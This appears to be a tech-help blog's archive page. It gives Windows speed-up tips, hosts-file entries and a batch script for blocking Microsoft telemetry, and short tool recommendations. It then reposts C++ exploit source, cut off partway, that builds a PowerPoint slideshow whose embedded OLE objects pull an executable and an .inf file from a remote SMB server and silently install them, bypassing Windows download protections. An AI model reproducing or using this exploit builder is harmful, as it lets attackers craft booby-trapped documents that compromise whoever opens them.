Category Archives: Fix

Speed Up a Slow Windows PC

Windows PCs don’t have to slow down over time. Whether your PC has gradually become slower or it suddenly ground to a halt a few minutes ago, there could be quite a few reasons for that slowness.

As with all PC issues, don’t be afraid to give your computer a reboot if something’s not working properly. This can fix quite a few problems and is faster than attempting to manually troubleshoot and fix the problem yourself.

Find Resource-Hungry Programs

Your PC is running slow because something is using up those resources. If it’s suddenly running slower, a runaway process might be using 99% of your CPU resources, for example. Or, an application might be experiencing a memory leak and using a large amount of memory, causing your PC to swap to disk. Alternately, an application might be using the disk a lot, causing other applications to slow down when they need to load data from or save it to the disk.

To find out, open the Task Manager. You can right-click your taskbar and select the “Task Manager” option or press Ctrl+Shift+Escape to open it. On Windows 8, 8.1, and 10, the new Task Manager provides an upgraded interface that color-codes applications using a lot of resources. Click the “CPU,” “Memory,” and “Disk” headers to sort the list by the applications using the most resources. If any application is using too much resources, you might want to close it normally — if you can’t, select it here and click “End Task” to force it to close.

Close System Tray Programs

Many applications tend to run in the system tray, or notification area. These applications often launch at startup and stay running in the background but remain hidden behind the up arrow icon at the bottom-right corner of your screen. Click the up arrow icon near the system tray, right-click any applications you don’t need running in the background, and close them to free up resources.

Disable Startup Programs

Better yet, prevent those applications from launching at startup to save memory and CPU cycles, as well as speed up the login process.

On Windows 8, 8.1, and 10, there’s now a startup manager in the Task Manager you can use to manage your startup programs. Right-click the taskbar and select “Task Manager” or press Ctrl+Shift+Escape to launch it. Click over to the Startup tab and disable startup applications you don’t need. Windows will helpfully tell you which applications slow down your startup process the most.

Reduce Animations

Windows uses quite a few animations, and those animations can make your PC seem a bit slower. For example, Windows can minimize and maximize windows instantly if you disable the associated animations.

To disable animations, press Windows Key + X or right-click the Start button and select “System.” Click “Advanced System Settings” on the left and click the “Settings” button under Performance. Choose “Adjust for best performance” under Visual Effects to disable all the animations, or select “Custom” and disable the individual animations you don’t want to see. For example, uncheck “Animate windows when minimizing and maximizing” to disable the minimize and maximize animations.

Lighten Your Web Browser

There’s a good chance you use your web browser a lot, so your web browser may just be a bit slow. It’s a good idea to use as few browser extensions, or add-ons, as possible — those slow down your web browser and cause it to use more memory.

Go into your web browser’s Extensions or Add-ons manager and remove add-ons you don’t need. You should also consider enabling click-to-play plug-ins. Preventing Flash and other content from loading will prevent unimportant Flash content from using CPU time.

Scan for Malware and Adware

There’s also a chance your computer is slow because malicious software is slowing it down and running in the background. This may not be flat-out malware — it may be software that interferes with your web browsing to track it and add additional advertisements, for example.

To be extra safe, scan your computer with an antivirus program. You should also scan it with Malwarebytes, which catches a lot of “potentially unwanted programs” (PUPs) that most antivirus programs tend to ignore. These programs try to sneak onto your computer when you install other software, and you almost certainly don’t want them.

Free Up Disk Space

If your hard drive is almost completely full, your computer may run noticeably slower. You want to leave your computer some room to work on your hard drive. Follow our guide to freeing up space on your Windows PC to free up room. You don’t need any third-party software — just running the Disk Cleanup tool included in Windows can help quite a bit.

Defragment Your Hard Disk

Defragmenting your hard disk actually shouldn’t be necessary on modern versions of Windows. It’ll automatically defragment mechanical hard drives in the background. Solid-state drives don’t really need traditional defragmentation, although modern versions of Windows will “optimize” them — and that’s fine.

You shouldn’t worry about defragmentation most of the time. However, if you do have a mechanical hard drive and you’ve just put a lot of files on the drive — for example, copying a huge database or gigabytes of PC game files — those files might be defragmented because Windows hasn’t gotten around to defragmenting them yet. In this situation, you might want to open the disk defragmenter tool and perform a scan to see if you need to run a manual defrag program.

Uninstall Programs You Don’t Use

Open the Control Panel, find the list of installed programs, and uninstall programs you don’t use and don’t need from your PC. This can help speed your PC up, as those programs might include background processes, autostart entries, system services, context menu entries, and other things that can slow down your PC. It’ll also save room on your hard drive and improve system security — for example, you definitely shouldn’t have Java installed if you’re not using it.

Reset Your PC / Reinstall Windows

If the other tips here didn’t fix your problem, the one timeless solution to fix Windows problems — aside from rebooting your PC, of course — is getting a fresh Windows installation.

On modern versions of Windows — that is, Windows 8, 8.1, and 10 — it’s easier to get a fresh Windows installation than ever. You don’t have to get Windows installation media and reinstall Windows. Instead, you can simply use the “Reset your PC” feature built into Windows to get a new, fresh Windows system. This is similar to reinstalling Windows and will wipe your installed programs and system settings while keeping your files.


If your PC is still using a mechanical hard drive, upgrading to a solid-state drive — or just ensuring your next PC has an SSD — will offer you a dramatic performance improvement, too. In an age where most people won’t notice faster CPUs and graphics processors, solid-state storage will offer the single biggest boost in overall system performance for most people.

Stop all of the telemetry servers – Microsoft Windows 10

Add the following lines below to your [c:windowssystem32driversetchosts] file in Windows 10. Make sure you open it from an elevated command prompt so you can save the changes! This will prevent all of the telemetry servers below from resolving so Microsoft Windows 10 will be unable to report your system data back to Microsoft. Take your privacy back!

Thank you,
Jerry (aka. Barnacules)
http://barnnerd.com
http://twitter.barnnerd.com
http://facebook.barnnerd.com
http://instagram.barnnerd.com
============================================
= Lines you need to add to your HOSTS file =
============================================
127.0.0.1       local
0.0.0.0 vortex.data.microsoft.com
0.0.0.0 vortex-win.data.microsoft.com
0.0.0.0 telecommand.telemetry.microsoft.com
0.0.0.0 telecommand.telemetry.microsoft.com.nsatc.net
0.0.0.0 oca.telemetry.microsoft.com
0.0.0.0 oca.telemetry.microsoft.com.nsatc.net
0.0.0.0 sqm.telemetry.microsoft.com
0.0.0.0 sqm.telemetry.microsoft.com.nsatc.net
0.0.0.0 watson.telemetry.microsoft.com
0.0.0.0 watson.telemetry.microsoft.com.nsatc.net
0.0.0.0 redir.metaservices.microsoft.com
0.0.0.0 choice.microsoft.com
0.0.0.0 choice.microsoft.com.nsatc.net
0.0.0.0 df.telemetry.microsoft.com
0.0.0.0 reports.wes.df.telemetry.microsoft.com
0.0.0.0 wes.df.telemetry.microsoft.com
0.0.0.0 services.wes.df.telemetry.microsoft.com
0.0.0.0 sqm.df.telemetry.microsoft.com
0.0.0.0 telemetry.microsoft.com
0.0.0.0 watson.ppe.telemetry.microsoft.com
0.0.0.0 telemetry.appex.bing.net
0.0.0.0 telemetry.urs.microsoft.com
0.0.0.0 telemetry.appex.bing.net:443
0.0.0.0 settings-sandbox.data.microsoft.com
0.0.0.0 vortex-sandbox.data.microsoft.com
0.0.0.0 survey.watson.microsoft.com
0.0.0.0 watson.live.com
0.0.0.0 watson.microsoft.com
0.0.0.0 statsfe2.ws.microsoft.com
0.0.0.0 corpext.msitadfs.glbdns2.microsoft.com
0.0.0.0 compatexchange.cloudapp.net
0.0.0.0 cs1.wpc.v0cdn.net
0.0.0.0 a-0001.a-msedge.net
0.0.0.0 statsfe2.update.microsoft.com.akadns.net
0.0.0.0 sls.update.microsoft.com.akadns.net
0.0.0.0 fe2.update.microsoft.com.akadns.net
0.0.0.0 65.55.108.23
0.0.0.0 65.39.117.230
0.0.0.0 23.218.212.69
0.0.0.0 134.170.30.202
0.0.0.0 137.116.81.24
0.0.0.0 diagnostics.support.microsoft.com
0.0.0.0 corp.sts.microsoft.com
0.0.0.0 statsfe1.ws.microsoft.com
0.0.0.0 pre.footprintpredict.com
0.0.0.0 204.79.197.200
0.0.0.0 23.218.212.69
0.0.0.0 i1.services.social.microsoft.com
0.0.0.0 i1.services.social.microsoft.com.nsatc.net
0.0.0.0 feedback.windows.com
0.0.0.0 feedback.microsoft-hohm.com

0.0.0.0 feedback.search.microsoft.com

Certain Windows updates in Windows 10 deliver extra “options” for telemetry on your machine.

For a guide on how to disable several telemetry options already, visit this website:
http://arstechnica.com/information-technology/2015/08/windows-10-doesnt-offer-much-privacy-by-default-heres-how-to-fix-it/
Another resource is available at:
https://fix10.isleaked.com/
Certain Windows updates in Windows 10 deliver extra “options” for telemetry on your machine. It is advisable to uninstall them:
http://www.kernelmode.info/forum/viewtopic.php?f=11&t=4001
For additional privacy, you can add these entries to your hosts file, which is located in:
C:Windowssystem32driversetc
You can edit and save the file by opening Notepad as Administrator (Press Windows key (“flag” icon), in the search bar enter “notepad”, right-click on notepad and choose Run as Administrator – then browse to the hosts file location).
Note: this does NOT block any Windows Updates.
Copy and paste the following below all the other text in there, save the file. That’s all:
#Microsoft telemetry
127.0.0.1 vortex.data.microsoft.com
127.0.0.1 vortex-win.data.microsoft.com
127.0.0.1 telecommand.telemetry.microsoft.com
127.0.0.1 telecommand.telemetry.microsoft.com.nsatc.net
127.0.0.1 oca.telemetry.microsoft.com
127.0.0.1 oca.telemetry.microsoft.com.nsatc.net
127.0.0.1 sqm.telemetry.microsoft.com
127.0.0.1 sqm.telemetry.microsoft.com.nsatc.net
127.0.0.1 watson.telemetry.microsoft.com
127.0.0.1 watson.telemetry.microsoft.com.nsatc.net
127.0.0.1 redir.metaservices.microsoft.com
127.0.0.1 choice.microsoft.com
127.0.0.1 choice.microsoft.com.nsatc.net
127.0.0.1 df.telemetry.microsoft.com
127.0.0.1 reports.wes.df.telemetry.microsoft.com
127.0.0.1 wes.df.telemetry.microsoft.com
127.0.0.1 services.wes.df.telemetry.microsoft.com
127.0.0.1 sqm.df.telemetry.microsoft.com
127.0.0.1 telemetry.microsoft.com
127.0.0.1 watson.ppe.telemetry.microsoft.com
127.0.0.1 telemetry.appex.bing.net
127.0.0.1 telemetry.urs.microsoft.com
127.0.0.1 telemetry.appex.bing.net:443
127.0.0.1 settings-sandbox.data.microsoft.com
127.0.0.1 vortex-sandbox.data.microsoft.com
127.0.0.1 survey.watson.microsoft.com
127.0.0.1 watson.live.com
127.0.0.1 watson.microsoft.com
127.0.0.1 statsfe2.ws.microsoft.com
127.0.0.1 corpext.msitadfs.glbdns2.microsoft.com
127.0.0.1 compatexchange.cloudapp.net
127.0.0.1 cs1.wpc.v0cdn.net
127.0.0.1 a-0001.a-msedge.net
127.0.0.1 65.55.108.23
127.0.0.1 65.39.117.230
127.0.0.1 23.218.212.69
127.0.0.1 134.170.30.202
127.0.0.1 137.116.81.24
127.0.0.1 diagnostics.support.microsoft.com
127.0.0.1 corp.sts.microsoft.com
127.0.0.1 statsfe1.ws.microsoft.com
127.0.0.1 pre.footprintpredict.com
127.0.0.1 204.79.197.200
127.0.0.1 23.218.212.69
127.0.0.1 i1.services.social.microsoft.com
127.0.0.1 i1.services.social.microsoft.com.nsatc.net
127.0.0.1 feedback.windows.com
127.0.0.1 feedback.microsoft-hohm.com

127.0.0.1 feedback.search.microsoft.com

Micro$oft Spy removal

Below is the list of “updates” that delivered by Windows Update as “telemetry and customer experience improvements”. If you don’t want upgrade to Win10 or send your “telemetry” to MS – remove them and do not install again.
Microsoft claims this is “telemetry” and customer experience blah-blah-blah. Well I call this simple – spyware.
https://support.microsoft.com/en-us/kb/3021917 – “Performance tracker update”
https://support.microsoft.com/en-us/kb/3035583 – “Get Windows 10 App” (delivers ready to use UAC backdoor as bonus)
https://support.microsoft.com/en-us/kb/2990214 – “Upgrade to Windows 10”
https://support.microsoft.com/en-us/kb/3044374 – “Upgrade to Windows 10”
https://support.microsoft.com/en-us/kb/2952664 – “Compatibility update for upgrading Windows 7”
https://support.microsoft.com/en-us/kb/3022345 – “Customer experience and diagnostic telemetry”
https://support.microsoft.com/en-us/kb/3068708 – “Customer experience and diagnostic telemetry”
https://support.microsoft.com/en-us/kb/3080149 – “Customer experience and diagnostic telemetry”
https://support.microsoft.com/en-us/kb/3075249 – “Telemetry points to consent.exe” !!!WARNING!!! this update add spyware functionality to UAC
COPY/PASTE script below the line into you command shell/command line (cmd.exe). To disable the evil spying services spread by Microsoft.

================================================================================================================

 

@echo off
echo
echo Step 1: Delete Updates…
echo Delete KB3075249 (telemetry for Win7/8.1)
start /w wusa.exe /uninstall /kb:3075249
echo Delete KB3080149 (telemetry for Win7/8.1)
start /w wusa.exe /uninstall /kb:3080149
echo Delete KB3021917 (telemetry for Win7)
start /w wusa.exe /uninstall /kb:3021917
echo Delete KB3022345 (telemetry)
start /w wusa.exe /uninstall /kb:3022345
echo Delete KB3068708 (telemetry)
start /w wusa.exe /uninstall /kb:3068708
echo Delete KB3044374 (Get Windows 10 for Win8.1)
start /w wusa.exe /uninstall /kb:3044374
echo Delete KB3035583 (Get Windows 10 for Win7sp1/8.1)
start /w wusa.exe /uninstall /kb:3035583
echo Delete KB2990214 (Get Windows 10 for Win7 without sp1)
start /w wusa.exe /uninstall /kb:2990214
echo Delete KB2990214 (Get Windows 10 for Win7)
start /w wusa.exe /uninstall /kb:2990214
echo Delete KB2952664 (Get Windows 10 assistant)
start /w wusa.exe /uninstall /kb:2952664
echo Delete KB3075853 (update for “Windows Update” on Win8.1/Server 2012R2)
start /w wusa.exe /uninstall /kb:3075853
echo Delete KB3065987 (update for “Windows Update” on Win7/Server 2008R2)
start /w wusa.exe /uninstall /kb:3065987
echo Delete KB3050265 (update for “Windows Update” on Win7)
start /w wusa.exe /uninstall /kb:3050265
echo Delete KB971033  (license validation)
start /w wusa.exe /uninstall /kb:971033
echo Delete KB2902907 (description not available)
start /w wusa.exe /uninstall /kb:2902907
echo Delete KB2976987 (description not available)
start /w wusa.exe /uninstall /kb:2976987
echo Step 2: Blocking Routes…
route -p add 23.218.212.69 MASK 255.255.255.255 0.0.0.0
route -p add 65.55.108.23 MASK 255.255.255.255 0.0.0.0
route -p add 65.39.117.230 MASK 255.255.255.255 0.0.0.0
route -p add 134.170.30.202 MASK 255.255.255.255 0.0.0.0
route -p add 137.116.81.24 MASK 255.255.255.255 0.0.0.0
route -p add 204.79.197.200 MASK 255.255.255.255 0.0.0.0
route -p add 23.218.212.69 MASK 255.255.255.255 0.0.0.0
echo Step 3: Disabling tasks…
schtasks /Change /TN “MicrosoftWindowsApplication ExperienceAitAgent” /DISABLE
schtasks /Change /TN “MicrosoftWindowsApplication ExperienceMicrosoft Compatibility Appraiser” /DISABLE
schtasks /Change /TN “MicrosoftWindowsApplication ExperienceProgramDataUpdater” /DISABLE
schtasks /Change /TN “MicrosoftWindowsAutochkProxy” /DISABLE
schtasks /Change /TN “MicrosoftWindowsCustomer Experience Improvement ProgramConsolidator” /DISABLE
schtasks /Change /TN “MicrosoftWindowsCustomer Experience Improvement ProgramKernelCeipTask” /DISABLE
schtasks /Change /TN “MicrosoftWindowsCustomer Experience Improvement ProgramUsbCeip” /DISABLE
schtasks /Change /TN “MicrosoftWindowsDiskDiagnosticMicrosoft-Windows-DiskDiagnosticDataCollector” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMaintenanceWinSAT” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterActivateWindowsSearch” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterConfigureInternetTimeService” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterDispatchRecoveryTasks” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterehDRMInit” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterInstallPlayReady” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia Centermcupdate” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterMediaCenterRecoveryTask” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterObjectStoreRecoveryTask” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterOCURActivate” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterOCURDiscovery” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterPBDADiscovery” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterPBDADiscoveryW1” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterPBDADiscoveryW2” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterPvrRecoveryTask” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterPvrScheduleTask” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterRegisterSearch” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterReindexSearchRoot” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterSqlLiteRecoveryTask” /DISABLE
schtasks /Change /TN “MicrosoftWindowsMedia CenterUpdateRecordPath” /DISABLE
echo Step 4: Killing Diagtrack-service (if it still exists)…
sc stop Diagtrack
sc delete Diagtrack
echo Final Step: Stop remoteregistry-service (if it still exists)…
sc config remoteregistry start= disabled
sc stop remoteregistry
echo All done, go to reboot!

pause

Process Explorer v16.05

 

 Download Process Explorer
(1.07 MB)

Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded.

The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you’ll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you’ll see the DLLs and memory-mapped files that the process has loaded. Process Explorer also has a powerful search capability that will quickly show you which processes have particular handles opened or DLLs loaded.

The unique capabilities of Process Explorer make it useful for tracking down DLL-version problems or handle leaks, and provide insight into the way Windows and applications work.

Best recovery CD

Hiren’s BootCD

Hiren’s BootCD is pretty legendary, and anyone who’s ever worked in support or systems administration has probably used it at least once (or has several version of it lying around still.) The rescue disc is aimed squarely at repairing Windows systems, and includes a wealth of tools to that effect, including antivirus tools to scan your hard drive, anti-malware utilities to clean out spyware and adware, even rootkit detection tools. Hiren’s BootCD can also help you repair, adjust, or re-flash your system’s BIOS or wipe your CMOS, clean out temporary files and folders, securely erase files, back up your data to another hard drive or to the network, update and back up hardware drivers, scan your system for hardware failures, repair lost or damaged partitions, and much much more. We’re only scratching the surface here. It’s completely free and always has been. Even if there are other tools in your toolkit, Hiren’s BootCD should be among them.

 

The Trinity Rescue Kit

The Trinity Rescue Kit is a customized Linux distribution that’s designed specifically for troubleshooting and reviving ailing systems, whether you’re running Windows or Linux. It fits nicely on a CD (or a USB stick if you prefer) and once booted gives you tools to reset lost Windows passwords, scan hard drives for viruses and malware, clone drives, recover lost partitions, even open up the drives as network shares so you can get files off of them and to other computers on your network. It’s completely free, although a donation to the developer behind it is always appreciated and keeps the project alive.

Windows NT 6.X OLE package manager remote code execution through MS Office Powerpoint XYZ slideshow (ppts, pptxs).

  1. /*++
    Title:
    Windows NT 6.X OLE package manager remote code execution through
    MS Office Powerpoint XYZ slideshow (ppts, pptxs).

    EID:
    00000217:2013/06/10

    Description:
    Undocumented features exist in Windows NT 6 OLE package manager.
    These features allow to bypass ‘Safe download’ mechanism from
    untrusted sources and to execute imm. The IContextMenu i-face
    is used by 3-rd party software (such as MS Office Powerpoint XYZ)
    to unpack and dispatch package data. Shell action to be applied
    to package is specified by action id in ‘cmd’ parameter of slide
    xml-based document. Action Id ‘-1’ and ‘-2’ are reserved by MS
    Office Powerpoint engine. Currently, silent ‘.inf’ installation
    is used for mitigation bypass. The MS Office for Windows XP
    contains internal OLE Package interpreter, so Windows XP doesn’t
    affected.
    Hi F-5ecure and E5et! We are offering you to patch holes and
    backdoors in your fucking AV-s. We know about them.

    Discovered:
    2013/06/06

    –*/

    #include <Windows.h>
    #include <OleAuto.h>
    #include <stdio.h>
    #include <OAIdl.h>
    #include <string>
    #include <shldisp.h>
    #include <tlhelp32.h>
    #include <assert.h>

    using namespace std;

    #define MAKE_OFFICE_IMPORT 0

    #if MAKE_OFFICE_IMPORT
    #import “z:Program Files (x86)Common Filesmicrosoft sharedVBAVBA6VBE6EXT.OLB”
    #import “z:Program Files (x86)Common Filesmicrosoft sharedOFFICE12mso.dll”
    #import “z:Program Files (x86)Microsoft OfficeOffice12msppt.olb”

    /* Modify office headers after import.
    In file vbe6ext.tlh specify:
    #include “mso.tlh”
    using namespace Office;

    In file msppt.tlh specify:
    #include “vbe6ext.tlh”
    using namespace VBIDE;
    */

    #else

    #if _DEBUG

    #include “Debugmso.tlh”
    #include “Debugvbe6ext.tlh”
    #include “Debugmsppt.tlh”

    #else

    #include “Releasemso.tlh”
    #include “Releasevbe6ext.tlh”
    #include “Releasemsppt.tlh”

    #endif

    #endif

    /* Processor definitions
    */
    static HRESULT __G_hresult = S_OK;

    #define CHK_HR( hr ) do { if (FAILED(__G_hresult = (hr))) { goto _Done; } } while(0)

    #define CHK_ALLOC( ptr ) do { if ((ptr) == NULL) {goto _Done; } } while(0)

    #define SAFE_RELEASE_BY_REF( obj ) do { if((*obj) != NULL) { (*obj )->Release(); *obj = NULL;} } while(0)

    #define SAFE_FREE_BSTR_BY_REF( obj ) do { if((*obj) != NULL) { SysFreeString((*obj)); (*obj) = NULL;} } while(0)

    #define VariantInitAsLong( var, val)
    VariantInit( &(var) );
    (var).vt = VT_I4;
    (var).lVal = val;

    /*************************************************************************
    Rtns definition
    *************************************************************************/
    int wmain(int argc, wchar_t **argv);
    bool change_file_time(__in wchar_t *fname);
    void print_usage_and_exit(__in wchar_t *exe);
    bool produce_presentation(__in wchar_t *fname, __in wchar_t *fnameSaveAs, __in wchar_t *fname1Tmp, __in wchar_t *fname2Tmp);
    bool presentation_does_have_ole_packages(__in PowerPoint::_Presentation *pPresentation, __out bool *doesHave);
    bool create_ole_embed_stg_copy(__in const wchar_t *file_result, __in char *str1, __in char *str2);
    bool rewrite_embeddings_in_presentation(__in wchar_t *fnamePpt, __in wchar_t *fnameData);
    bool parse_cmd(int argc, wchar_t **argv, wstring *fnamePptIn, wstring *smbPath, wstring *fnameExe,wstring *fnameExeOnSmb,wstring *fnameInfOnSmb, bool *bForceUpload);

    /*************************************************************************
    Rtns implementation
    *************************************************************************/
    bool produce_presentation(__in wchar_t *fname, __in wchar_t *fnameSaveAs, __in wchar_t *fname1Tmp, __in wchar_t *fname2Tmp) {

    wstring stdWstrFileSaveAs;
    PowerPoint::PpSaveAsFileType saveAsType;
    bool bres = false,
    bDoesHaveOlePackages = false;
    CLSID appClsid = { 0 };
    BSTR bstrApplicationProgId = NULL,
    bstrPresentationPath = NULL,
    bstrSaveAs = NULL;
    PowerPoint::_Application *pApplication = NULL;
    PowerPoint::Presentations *pPresentations = NULL;
    PowerPoint::_Presentation *pPresentation = NULL;
    PowerPoint::Slides *pSlides = NULL;
    PowerPoint::_Slide *pSlide = NULL;
    PowerPoint::Shapes *pShapes = NULL;
    PowerPoint::Shape *pShape0 = NULL,
    *pShape1 = NULL,
    *pShapeCurr = NULL;
    PowerPoint::TimeLine *pTimeLine = NULL;
    PowerPoint::Sequences *pSequences = NULL;
    PowerPoint::Sequence *pSequence = NULL;
    PowerPoint::Effect *pEffect = NULL;
    PowerPoint::AnimationBehaviors *pAnimationBehaviors = NULL;
    PowerPoint::AnimationBehavior *pAnimationBehavior = NULL;
    PowerPoint::CommandEffect *pCommandEffect = NULL;
    PowerPoint::SlideShowTransition *pSlideShowTransition = NULL;
    VARIANT varSlideIndex;

    /* Produce file name for saving
    */
    stdWstrFileSaveAs.append(fnameSaveAs);

    saveAsType = PowerPoint::PpSaveAsFileType::ppSaveAsOpenXMLShow;

    CHK_ALLOC( bstrApplicationProgId = SysAllocString(L”Powerpoint.Application”));

    /* Obtain POwerPoint App CLSID from PowerPoint App Identifier
    */
    CHK_HR( CLSIDFromProgID( bstrApplicationProgId, &appClsid) );

    /* Create instance of POWERPOINT Application
    */
    CHK_HR( CoCreateInstance(
    appClsid,
    NULL,
    CLSCTX_LOCAL_SERVER,
    __uuidof(PowerPoint::_Application),
    (LPVOID*)&pApplication) );

    /* Get presentation collection
    */
    CHK_HR( pApplication ->get_Presentations(&pPresentations) );

    /* Open presentation
    */
    CHK_ALLOC( bstrPresentationPath = SysAllocString(fname) );

    CHK_HR( pPresentations ->raw_Open(
    bstrPresentationPath,
    Office::MsoTriState::msoFalse,
    Office::MsoTriState::msoFalse,
    Office::MsoTriState::msoFalse,
    &pPresentation) );

    /* Make sure that presentation doesn’t have a lot of ole packages
    */
    if (!presentation_does_have_ole_packages(pPresentation, &bDoesHaveOlePackages)) {

    CHK_HR( E_ABORT );
    }

    if (bDoesHaveOlePackages) {

    printf(“[-] ERROR: Specified presentation already includes OLE objects or no slides found.n”);

    CHK_HR( E_ABORT );
    }

    /* Get collection of slides
    */

    CHK_HR( pPresentation ->get_Slides( &pSlides) );

    /* Get first slide by index
    */
    VariantInitAsLong(varSlideIndex, 1);

    CHK_HR( pSlides ->raw_Item( varSlideIndex, &pSlide) );

    /* Get collection of shapes in slide
    */
    CHK_HR( pSlide ->get_Shapes( &pShapes) );

    /* Add 1-th shape to slide as first OLE object
    */
    CHK_HR( pShapes ->raw_AddOLEObject(
    100.0, -100.0, 30.0, 30.0,
    _bstr_t(L””),
    _bstr_t(fname1Tmp),
    Office::MsoTriState::msoFalse,
    _bstr_t(L””),
    0,
    _bstr_t(L””),
    Office::MsoTriState::msoFalse,
    &pShape0
    ) );

    /* Add 2-th shape to slide as second OLE object
    */
    CHK_HR( pShapes ->raw_AddOLEObject(
    150.0, -100.0, 30.0, 30.0,
    _bstr_t(L””),
    _bstr_t(fname2Tmp),
    Office::MsoTriState::msoFalse,
    _bstr_t(L””),
    0,
    _bstr_t(L””),
    Office::MsoTriState::msoFalse,
    &pShape1
    ) );

    /* Configure slide timing
    */
    CHK_HR( pSlide ->get_TimeLine( &pTimeLine ) );

    /* Obtain Main Sequence for timeLine of slide
    */
    CHK_HR( pTimeLine ->get_MainSequence( &pSequence) );

    /* Produce first effect for 1-th shape.
    1-th shape specifies OLE Object which just copies .exe payload
    from remote SMB server and stores in temporary file.
    Specify command verb as ‘-3’ which tells to ShellApi do nothing.
    Effect with id 1 loads slide background.
    Effect with id 2 loads exe stub from remote server.
    */
    {
    CHK_HR( pSequence ->raw_AddEffect(
    pShape0,
    PowerPoint::MsoAnimEffect::msoAnimEffectFlashOnce,
    PowerPoint::MsoAnimateByLevel::msoAnimateLevelNone,
    PowerPoint::MsoAnimTriggerType::msoAnimTriggerWithPrevious, //PowerPoint::MsoAnimTriggerType::msoAnimTriggerOnPageClick,
    1,
    &pEffect) );

    SAFE_RELEASE_BY_REF( &pEffect );

    CHK_HR( pSequence ->raw_AddEffect(
    pShape0,
    PowerPoint::MsoAnimEffect::msoAnimEffectFlashOnce,
    PowerPoint::MsoAnimateByLevel::msoAnimateLevelNone,
    PowerPoint::MsoAnimTriggerType::msoAnimTriggerAfterPrevious, //PowerPoint::MsoAnimTriggerType::msoAnimTriggerOnPageClick,
    2,
    &pEffect) );

    CHK_HR( pEffect ->get_Behaviors( &pAnimationBehaviors) );

    CHK_HR( pAnimationBehaviors ->raw_Add( PowerPoint::MsoAnimType::msoAnimTypeCommand, 1, &pAnimationBehavior) );

    CHK_HR( pAnimationBehavior ->get_CommandEffect( &pCommandEffect) );

    CHK_HR( pCommandEffect ->put_Type( PowerPoint::MsoAnimCommandType::msoAnimCommandTypeVerb) );

    CHK_HR( pCommandEffect ->put_Command( _bstr_t(L”-3″)) );
    }

    /* Release resources assigned with Shape0
    */
    SAFE_RELEASE_BY_REF( &pCommandEffect );
    SAFE_RELEASE_BY_REF( &pAnimationBehavior );
    SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
    SAFE_RELEASE_BY_REF( &pEffect );
    SAFE_RELEASE_BY_REF( &pShape0 );

    /* Produce first effect for 2-th shape.
    2-th shape specifies OLE Object which simple copies .inf file
    from remote SMB server and stores in temporary file with .inf extension.
    Specify command verb as ‘3’ which tells to ShellApi do ‘Install’ action.
    Effect with id 3 loads .inf from remote server and start it.
    */
    {
    CHK_HR( pSequence ->raw_AddEffect(
    pShape1,
    PowerPoint::MsoAnimEffect::msoAnimEffectFlashOnce,
    PowerPoint::MsoAnimateByLevel::msoAnimateLevelNone,
    PowerPoint::MsoAnimTriggerType::msoAnimTriggerAfterPrevious,
    3,
    &pEffect) );

    CHK_HR( pEffect ->get_Behaviors( &pAnimationBehaviors) );

    CHK_HR( pAnimationBehaviors ->raw_Add( PowerPoint::MsoAnimType::msoAnimTypeCommand, 1, &pAnimationBehavior) );

    CHK_HR( pAnimationBehavior ->get_CommandEffect( &pCommandEffect) );

    CHK_HR( pCommandEffect ->put_Type( PowerPoint::MsoAnimCommandType::msoAnimCommandTypeVerb) );

    CHK_HR( pCommandEffect ->put_Command( _bstr_t(L”3″)) );
    }
    /* Release resources assigned with Shape1
    */
    SAFE_RELEASE_BY_REF( &pCommandEffect );
    SAFE_RELEASE_BY_REF( &pAnimationBehavior );
    SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
    SAFE_RELEASE_BY_REF( &pEffect );
    SAFE_RELEASE_BY_REF( &pShape1 );

    /* Configure SlideShowTransition
    */

    CHK_HR( pSlide ->get_SlideShowTransition(&pSlideShowTransition) );

    CHK_HR( pSlideShowTransition ->put_EntryEffect( PowerPoint::PpEntryEffect::ppEffectBoxOut ) );

    CHK_HR( pSlideShowTransition ->put_AdvanceTime( 0.5 ) );

    SAFE_RELEASE_BY_REF( &pSlideShowTransition );

    /* Release resources assigned with Presentation
    */
    SAFE_RELEASE_BY_REF( &pSequence );
    SAFE_RELEASE_BY_REF( &pTimeLine );
    SAFE_RELEASE_BY_REF( &pShapes );
    SAFE_RELEASE_BY_REF( &pSlide );
    SAFE_RELEASE_BY_REF( &pSlides );

    /* Save presentation
    */
    CHK_ALLOC(bstrSaveAs = SysAllocString(stdWstrFileSaveAs.c_str()) );

    CHK_HR( pPresentation ->raw_SaveAs( bstrSaveAs, saveAsType, Office::MsoTriState::msoTriStateMixed) );

    bres = true;

    _Done:

    VariantClear( &varSlideIndex );

    SAFE_FREE_BSTR_BY_REF( &bstrPresentationPath );

    SAFE_FREE_BSTR_BY_REF( &bstrApplicationProgId );

    SAFE_FREE_BSTR_BY_REF( &bstrSaveAs );

    /* Release resources assigned with Shape0 and Shape1
    */
    SAFE_RELEASE_BY_REF( &pCommandEffect );
    SAFE_RELEASE_BY_REF( &pAnimationBehavior );
    SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
    SAFE_RELEASE_BY_REF( &pEffect );
    SAFE_RELEASE_BY_REF( &pShape0 );
